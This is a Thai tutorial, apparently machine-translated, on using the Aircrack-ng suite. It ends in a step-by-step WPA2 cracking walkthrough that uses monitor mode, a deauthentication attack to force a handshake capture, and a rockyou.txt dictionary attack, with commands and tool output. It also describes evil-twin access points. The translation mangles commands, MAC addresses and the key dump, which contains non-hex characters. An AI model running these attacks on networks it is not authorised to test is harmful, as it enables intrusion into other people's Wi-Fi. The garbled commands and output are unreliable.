วิธีใช้ Aircrack-ng

How Use Aircrack Ng



คนส่วนใหญ่ไม่เคยคิดถึงเครือข่ายที่พวกเขาเชื่อมต่อ พวกเขาไม่เคยคิดว่าเครือข่ายนั้นปลอดภัยเพียงใดและเสี่ยงต่อข้อมูลที่เป็นความลับในแต่ละวันมากแค่ไหน คุณสามารถเรียกใช้การตรวจสอบช่องโหว่บนเครือข่าย wifi ของคุณได้โดยใช้เครื่องมือที่ทรงพลังที่เรียกว่า Aircrack-ng และไวร์ชาร์ค Wireshark ใช้เพื่อตรวจสอบกิจกรรมเครือข่าย Aircrack-ng เป็นเหมือนเครื่องมือเชิงรุกที่ให้คุณแฮ็คและให้การเข้าถึงการเชื่อมต่อไร้สาย การคิดว่าเป็นผู้บุกรุกเป็นวิธีที่ปลอดภัยที่สุดในการป้องกันตัวเองจากการถูกแฮ็ก คุณอาจสามารถเข้าใจการกระทำที่ผู้บุกรุกจะทำเพื่อเข้าถึงระบบของคุณโดยการเรียนรู้เกี่ยวกับ aircrack จากนั้นคุณสามารถดำเนินการตรวจสอบการปฏิบัติตามข้อกำหนดในระบบของคุณเองเพื่อให้แน่ใจว่าจะไม่ปลอดภัย

Aircrack-ng เป็นซอฟต์แวร์ครบชุดที่ออกแบบมาเพื่อทดสอบความปลอดภัยเครือข่าย WiFi มันไม่ได้เป็นเพียงเครื่องมือเดียวแต่เป็นชุดของเครื่องมือ ซึ่งแต่ละเครื่องมือมีจุดประสงค์เฉพาะ สามารถทำงานในด้านการรักษาความปลอดภัย wifi ในด้านต่างๆ ได้ เช่น การตรวจสอบจุดเข้าใช้งาน การทดสอบ การโจมตีเครือข่าย การแคร็กเครือข่าย wifi และการทดสอบ วัตถุประสงค์หลักของ Aircrack คือการสกัดกั้นแพ็กเก็ตและถอดรหัสแฮชเพื่อทำลายรหัสผ่าน รองรับอินเทอร์เฟซไร้สายใหม่เกือบทั้งหมด Aircrack-ng เป็นเวอร์ชันปรับปรุงของชุดเครื่องมือ Aircrack ที่ล้าสมัย ng หมายถึง รุ่นใหม่ . เครื่องมือที่ยอดเยี่ยมบางอย่างที่ทำงานร่วมกันเพื่อทำงานที่ใหญ่ขึ้น







แอร์มอน:

Airmon-ng รวมอยู่ในชุด aircrack-ng ที่วางการ์ดอินเทอร์เฟซเครือข่ายในโหมดจอภาพ การ์ดเครือข่ายมักจะยอมรับเฉพาะแพ็กเก็ตที่กำหนดเป้าหมายสำหรับพวกเขาตามที่กำหนดโดยที่อยู่ MAC ของ NIC แต่ด้วย airmon-ng แพ็กเก็ตไร้สายทั้งหมดไม่ว่าจะกำหนดเป้าหมายสำหรับพวกเขาหรือไม่ก็ตามก็จะได้รับการยอมรับเช่นกัน คุณควรจะสามารถดักจับแพ็กเก็ตเหล่านี้ได้โดยไม่ต้องลิงก์หรือตรวจสอบสิทธิ์กับจุดเชื่อมต่อ ใช้เพื่อตรวจสอบสถานะของจุดเข้าใช้งานโดยกำหนดให้อินเทอร์เฟซเครือข่ายอยู่ในโหมดจอภาพ ประการแรก เราต้องกำหนดค่าการ์ดไร้สายให้เปิดโหมดจอภาพ จากนั้นปิดกระบวนการพื้นหลังทั้งหมด หากคุณคิดว่ากระบวนการใดๆ ขัดขวาง หลังจากสิ้นสุดกระบวนการ คุณสามารถเปิดใช้งานโหมดการตรวจสอบบนอินเทอร์เฟซไร้สายได้โดยการรันคำสั่งด้านล่าง:



[ป้องกันอีเมล] :~$sudoairmon-ng เริ่ม wlan0#

คุณยังสามารถปิดใช้งานโหมดจอภาพได้ด้วยการหยุด airmon-ng ทุกเมื่อโดยใช้คำสั่งด้านล่าง:

[ป้องกันอีเมล] :~$sudoairmon-ng หยุด wlan0#

แอร์โรดัม:

Airodump-ng ใช้เพื่อแสดงรายการเครือข่ายทั้งหมดที่อยู่รอบตัวเรา และดูข้อมูลที่มีค่าเกี่ยวกับเครือข่ายเหล่านั้น ฟังก์ชันพื้นฐานของ airodump-ng คือการดมกลิ่นแพ็กเก็ต ดังนั้นจึงถูกตั้งโปรแกรมให้จับแพ็กเก็ตทั้งหมดรอบตัวเราในขณะที่อยู่ในโหมดมอนิเตอร์ เราจะเรียกใช้กับการเชื่อมต่อทั้งหมดรอบตัวเรา และรวบรวมข้อมูล เช่น จำนวนไคลเอนต์ที่เชื่อมต่อกับเครือข่าย ที่อยู่ Mac ที่สอดคล้องกัน ลักษณะการเข้ารหัส และชื่อช่องสัญญาณ จากนั้นจึงเริ่มกำหนดเป้าหมายเครือข่ายเป้าหมายของเรา

โดยการพิมพ์คำสั่ง airodump-ng และตั้งชื่ออินเทอร์เฟซเครือข่ายเป็นพารามิเตอร์ เราสามารถเปิดใช้งานเครื่องมือนี้ได้ โดยจะแสดงรายการจุดเชื่อมต่อทั้งหมด จำนวนแพ็คเก็ตข้อมูล วิธีการเข้ารหัสและการตรวจสอบสิทธิ์ที่ใช้ และชื่อเครือข่าย (ESSID) จากมุมมองของการแฮ็ก ที่อยู่ Mac เป็นฟิลด์ที่สำคัญที่สุด

[ป้องกันอีเมล] :~$sudoairodump-ng wlx0mon

แอร์แคร็ก:

Aircrack ใช้สำหรับถอดรหัสรหัสผ่าน หลังจากจับแพ็กเก็ตทั้งหมดโดยใช้ airodump เราสามารถถอดรหัสคีย์ด้วย aircrack มันถอดรหัสคีย์เหล่านี้โดยใช้สองวิธี PTW และ FMS วิธีการของรถสองและรถสามล้อเครื่องจะกระทำในสองขั้นตอน ในตอนแรก จะใช้เฉพาะแพ็กเก็ต ARP เท่านั้น และหลังจากนั้น หากคีย์ไม่แตกหลังจากการค้นหา ก็จะใช้แพ็กเก็ตที่ดักจับอื่นๆ ทั้งหมด ข้อดีอีกอย่างของแนวทาง PTW คือไม่ได้ใช้แพ็กเก็ตทั้งหมดสำหรับการแคร็ก ในแนวทางที่สอง นั่นคือ FMS เราใช้ทั้งแบบจำลองทางสถิติและอัลกอริทึมแบบดุดันเพื่อถอดรหัสคีย์ สามารถใช้วิธีพจนานุกรมได้

ออกอากาศ:

Airplay-ng แนะนำแพ็กเก็ตให้กับเครือข่ายไร้สายเพื่อสร้างหรือเร่งการรับส่งข้อมูล สามารถดักจับแพ็กเก็ตจากสองแหล่งที่แตกต่างกันโดย aireplay-ng อันแรกคือเครือข่ายสด และอันที่สองคือแพ็กเก็ตจากไฟล์ pcap ที่มีอยู่แล้ว Airplay-ng มีประโยชน์ในระหว่างการโจมตีแบบ deauthentication ที่กำหนดเป้าหมายไปยังจุดเชื่อมต่อไร้สายและผู้ใช้ ยิ่งไปกว่านั้น คุณสามารถทำการโจมตีบางอย่างได้ เช่น การโจมตีกาแฟลาเต้ด้วย airplay-ng ซึ่งเป็นเครื่องมือที่ช่วยให้คุณได้รับคีย์จากระบบของลูกค้า คุณสามารถทำได้โดยจับแพ็กเก็ต ARP จากนั้นจัดการและส่งกลับไปยังระบบ ลูกค้าจะสร้างแพ็กเก็ตที่สามารถดักจับโดย airodump และ aircrack ถอดรหัสคีย์จากแพ็กเก็ตที่แก้ไขนั้น ตัวเลือกการโจมตีอื่นๆ ของ airplay-ng ได้แก่ chopchop, fragment arepreplay เป็นต้น

ฐานทัพอากาศ:

Airbase-ng ใช้เพื่อแปลงคอมพิวเตอร์ของผู้บุกรุกให้เป็นจุดเชื่อมต่อที่ถูกบุกรุกเพื่อให้ผู้อื่นเชื่อมโยงได้ เมื่อใช้ Airbase-ng คุณสามารถอ้างว่าเป็นจุดเข้าใช้งานที่ถูกกฎหมายและดำเนินการโจมตีแบบ man-in-the-middle บนคอมพิวเตอร์ที่เชื่อมต่อกับเครือข่ายของคุณ การโจมตีประเภทนี้เรียกว่า Evil Twin Attacks เป็นไปไม่ได้ที่ผู้ใช้พื้นฐานจะแยกแยะระหว่างจุดเชื่อมต่อที่ถูกกฎหมายและจุดเชื่อมต่อปลอม ดังนั้น Evil Twin Threat เป็นหนึ่งในภัยคุกคามไร้สายที่คุกคามมากที่สุดที่เราเผชิญอยู่ในปัจจุบัน

แอร์โรลิบง:

Airolib เร่งกระบวนการแฮ็คด้วยการจัดเก็บและจัดการรายการรหัสผ่านและจุดเชื่อมต่อ ระบบจัดการฐานข้อมูลที่โปรแกรมนี้ใช้คือ SQLite3 ซึ่งส่วนใหญ่จะใช้ได้กับทุกแพลตฟอร์ม การถอดรหัสรหัสผ่านรวมถึงการคำนวณของมาสเตอร์คีย์แบบคู่ผ่านคีย์ส่วนตัวชั่วคราว (PTK) ที่ถูกแยกออกมา เมื่อใช้ PTK คุณสามารถกำหนดรหัสระบุข้อความเฟรม (MIC) สำหรับแพ็กเก็ตที่กำหนดและค้นหา MIC ในทางทฤษฎีว่าคล้ายกับแพ็กเก็ต ดังนั้นหาก PTK ถูกต้อง PMK ก็ถูกต้องเช่นกัน

หากต้องการดูรายการรหัสผ่านและเข้าถึงเครือข่ายที่จัดเก็บไว้ในฐานข้อมูล ให้พิมพ์คำสั่งต่อไปนี้:

[ป้องกันอีเมล] :~$sudoฐานข้อมูลการทดสอบ airolib-ng –stats

ที่นี่ฐานข้อมูลทดสอบคือฐานข้อมูลที่คุณต้องการเข้าถึงหรือสร้าง และ –stats คือการดำเนินการที่คุณต้องการดำเนินการ คุณสามารถดำเนินการได้หลายอย่างในฟิลด์ฐานข้อมูล เช่น ให้ความสำคัญกับ SSID บางอย่างหรือบางอย่าง ในการใช้ airolib-ng กับ aircrack-ng ให้ป้อนคำสั่งต่อไปนี้:

[ป้องกันอีเมล] :~$sudoaircrack-ng-NSฐานข้อมูลการทดสอบ wpa2.eapol.cap

ที่นี่เราใช้ PMK ที่คำนวณแล้วที่เก็บไว้ใน ทดสอบฐานข้อมูล เพื่อเร่งกระบวนการถอดรหัสรหัสผ่าน

การแคร็ก WPA/WPA2 โดยใช้ Aircrack-ng:

มาดูตัวอย่างเล็กๆ น้อยๆ ว่า aircrack-ng สามารถทำอะไรได้บ้างโดยใช้เครื่องมือที่ยอดเยี่ยมสองสามอย่าง เราจะถอดรหัสคีย์ที่แชร์ล่วงหน้าของเครือข่าย WPA/WPA2 โดยใช้วิธีการพจนานุกรม

สิ่งแรกที่เราต้องทำคือแสดงรายการอินเทอร์เฟซเครือข่ายที่รองรับโหมดมอนิเตอร์ สามารถทำได้โดยใช้คำสั่งต่อไปนี้:

[ป้องกันอีเมล] :~$sudoairmon-ng

ชิปเซ็ตไดรเวอร์อินเทอร์เฟซ PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

เราสามารถเห็นอินเทอร์เฟซ ตอนนี้ เราต้องใส่อินเทอร์เฟซเครือข่ายที่เราพบ ( wlx0 ) ในโหมดมอนิเตอร์โดยใช้คำสั่งต่อไปนี้:

[ป้องกันอีเมล] :~$sudoairmon-ng เริ่ม wlx0

ได้เปิดใช้งานโหมดจอภาพบนอินเทอร์เฟซที่เรียกว่า wlx0mon .

ตอนนี้เราควรเริ่มฟังการออกอากาศโดยเราเตอร์ใกล้เคียงผ่านอินเทอร์เฟซเครือข่ายของเราที่เราได้วางไว้ในโหมดมอนิเตอร์

[ป้องกันอีเมล] :~$sudoairodump-ng wlx0mon

CH5 ][ผ่านไป:30NS][ 2020-12-02 00:17



BSSID PWR บีคอน#ข้อมูล #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: ซีอี:31 -สี่ห้า 62 27 0 154e WPA2 CCMP PSK CrackIt

C4:E9:84:76:10:เป็น-63 77 0 0 654จ. WPA2 CCMP PSK Hackme

C8:3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74:ให้:88:FA:38: 02-68 28 2 0 สิบเอ็ด54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION อัตรา PWR โพรบเฟรมที่หายไป



E4: 6F:13: 04: ซีอี:315C:3A:สี่ห้า: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: ซีอี:31C4:67:D3:C2:ซีดี:D7 -331e- 6e0 3

E4: 6F:13: 04: ซีอี:315C:C3:07:56:61: เอฟ -35 0-1 0 6

E4: 6F:13: 04: ซีอี:31ปีก่อนคริสตกาล:91:B5:F8:7E:D5 -390e-1 1002 13

เครือข่ายเป้าหมายของเราคือ Crackit ในกรณีนี้ซึ่งกำลังฉายอยู่ทางช่อง 1

ที่นี่เพื่อถอดรหัสรหัสผ่านของเครือข่ายเป้าหมาย เราจำเป็นต้องจับการจับมือแบบ 4 ทาง ซึ่งเกิดขึ้นเมื่ออุปกรณ์พยายามเชื่อมต่อกับเครือข่าย เราสามารถจับภาพได้โดยใช้คำสั่งต่อไปนี้:

[ป้องกันอีเมล] :~$sudoairodump-ng-ค 1--bssid E4: 6F:13: 04: ซีอี:31 -ใน /บ้าน wlx0

-ค : ช่อง

–Bss : Bssid ของเครือข่ายเป้าหมาย

-ใน : ชื่อของไดเร็กทอรีที่จะวางไฟล์ pcap

ตอนนี้เราต้องรอให้อุปกรณ์เชื่อมต่อกับเครือข่าย แต่มีวิธีที่ดีกว่าในการจับมือกัน เราสามารถยกเลิกการตรวจสอบอุปกรณ์ไปยัง AP โดยใช้การโจมตี deauthentication โดยใช้คำสั่งต่อไปนี้:

[ป้องกันอีเมล] :~$sudoaireplay-ng-0 -ถึงE4: 6F:13: 04: ซีอี:31

ถึง : Bssid ของเครือข่ายเป้าหมาย

-0 : การโจมตี deauthentication

เราได้ยกเลิกการเชื่อมต่ออุปกรณ์ทั้งหมดแล้ว และตอนนี้เราต้องรอให้อุปกรณ์เชื่อมต่อกับเครือข่าย

CH1 ][ผ่านไป:30NS][ 2020-12-02 00:02][จับมือ WPA: E4: 6F:13: 04: ซีอี:31



BSSID PWR RXQ บีคอน#ข้อมูล #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: ซีอี:31 -47 1 228 807 36 1WPA2 CCMP PSK P . ครั้งที่ 54



BSSID STATION อัตรา PWR โพรบเฟรมที่หายไป



E4: 6F:13: 04: ซีอี:31ปีก่อนคริสตกาล:91:B5:F8:7E:D5 -35 0-1 0 1

E4: 6F:13: 04: ซีอี:315C:3A:สี่ห้า: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: ซีอี:31 88:28: B3:30:27:7E -310e-1 0 32

E4: 6F:13: 04: ซีอี:31C4:67:D3:C2:ซีดี:D7 -350e- 6e263 708แคร็กอิท

E4: 6F:13: 04: ซีอี:31D4: 6A: 6A:99:ED:E3 -350e- 0e0 86

E4: 6F:13: 04: ซีอี:315C:C3:07:56:61: เอฟ -37 0- 1e0 1

เราถูกโจมตี และเมื่อดูที่มุมขวาบนถัดจากเวลา เราจะเห็นว่ามีการจับมือกัน ตอนนี้ดูในโฟลเดอร์ที่ระบุ ( /บ้าน ในกรณีของเรา ) สำหรับ a .pcap ไฟล์.

ในการถอดรหัสคีย์ WPA เราสามารถใช้คำสั่งต่อไปนี้:

[ป้องกันอีเมล] :~$sudoaircrack-ng-a2 -ในrockyou.txt-NSE4: 6F:13: 04: ซีอี:31จับมือ.cap

b :Bssid ของเครือข่ายเป้าหมาย

-a2 :โหมด WPA2

Rockyou.txt: พจนานุกรมไฟล์ใช้แล้ว

Handshake.cap: Theไฟล์ ที่มีการจับมือกัน

Aircrack-ng1.2beta3

[00:01:49] 10566กุญแจทดสอบ(1017.96ถึง/NS)

ข้อมูลสำคัญ! [คุณมีฉัน]

มาสเตอร์คีย์ : 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6Fห้าสิบ


คีย์ชั่วคราว : 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6Fห้าสิบC025 62E9 5D71

กุญแจสู่เครือข่ายเป้าหมายของเราถูกถอดรหัสสำเร็จแล้ว

บทสรุป:

เครือข่ายไร้สายมีอยู่ทุกที่ ทุกบริษัทใช้ ตั้งแต่พนักงานที่ใช้สมาร์ทโฟนไปจนถึงอุปกรณ์ควบคุมอุตสาหกรรม จากการวิจัยพบว่าเกือบร้อยละ 50 ของปริมาณการใช้อินเทอร์เน็ตจะผ่าน WiFi ในปี 2564 เครือข่ายไร้สายมีข้อดีหลายประการ การสื่อสารภายนอกประตู การเข้าถึงอินเทอร์เน็ตอย่างรวดเร็วในสถานที่ที่แทบจะวางสายไม่ได้ สามารถขยายเครือข่ายโดยไม่ต้องติดตั้งสายเคเบิล สำหรับผู้ใช้รายอื่น และสามารถเชื่อมต่ออุปกรณ์มือถือของคุณกับโฮมออฟฟิศของคุณได้อย่างง่ายดายในขณะที่คุณไม่อยู่

แม้จะมีข้อดีเหล่านี้ แต่ก็ยังมีคำถามมากมายเกี่ยวกับความเป็นส่วนตัวและความปลอดภัยของคุณ เป็นเครือข่ายเหล่านี้ ภายในช่วงการส่งสัญญาณของเราเตอร์นั้นเปิดให้ทุกคนสามารถโจมตีได้ง่าย และข้อมูลของคุณอาจถูกบุกรุกได้ง่าย ตัวอย่างเช่น หากคุณเชื่อมต่อกับ wifi สาธารณะ ใครก็ตามที่เชื่อมต่อกับเครือข่ายนั้นสามารถตรวจสอบการรับส่งข้อมูลเครือข่ายของคุณได้อย่างง่ายดายโดยใช้ข้อมูลอัจฉริยะและด้วยความช่วยเหลือของเครื่องมือที่ยอดเยี่ยมที่มีอยู่และแม้กระทั่งการถ่ายโอนข้อมูล